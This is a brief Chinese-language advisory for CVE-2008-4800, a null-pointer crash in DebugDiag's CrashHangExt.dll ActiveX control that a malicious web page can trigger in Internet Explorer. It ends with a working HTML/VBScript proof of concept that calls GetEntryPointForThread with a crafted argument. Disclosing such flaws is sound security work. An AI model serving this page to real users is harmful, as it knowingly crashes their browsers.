BUGTRAQ ID: 31996
CVE(CAN) ID: CVE-2008-4800
调试诊断工具(DebugDiag)用于排除Win32用户态进程中挂起、内存泄露或崩溃等故障。
DebugDiag所提供的CrashHangExt.dll没有正确地验证某些输入参数,如果用户受骗访问了恶意网页的话,就会在使用该控件的应用(通常为IE)中触发空指针引用,导致拒绝服务的情况。
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
<a href=“http://www.microsoft.com/technet/security/” target=“_blank”>http://www.microsoft.com/technet/security/</a>
<body>
<object classid='clsid:7233D6F8-AD31-440F-BAF0-9E7A292A53DA' id='target' />
</object>
<script language='vbscript'>
arg1=-2147483647
target.GetEntryPointForThread arg1
</script>
</body>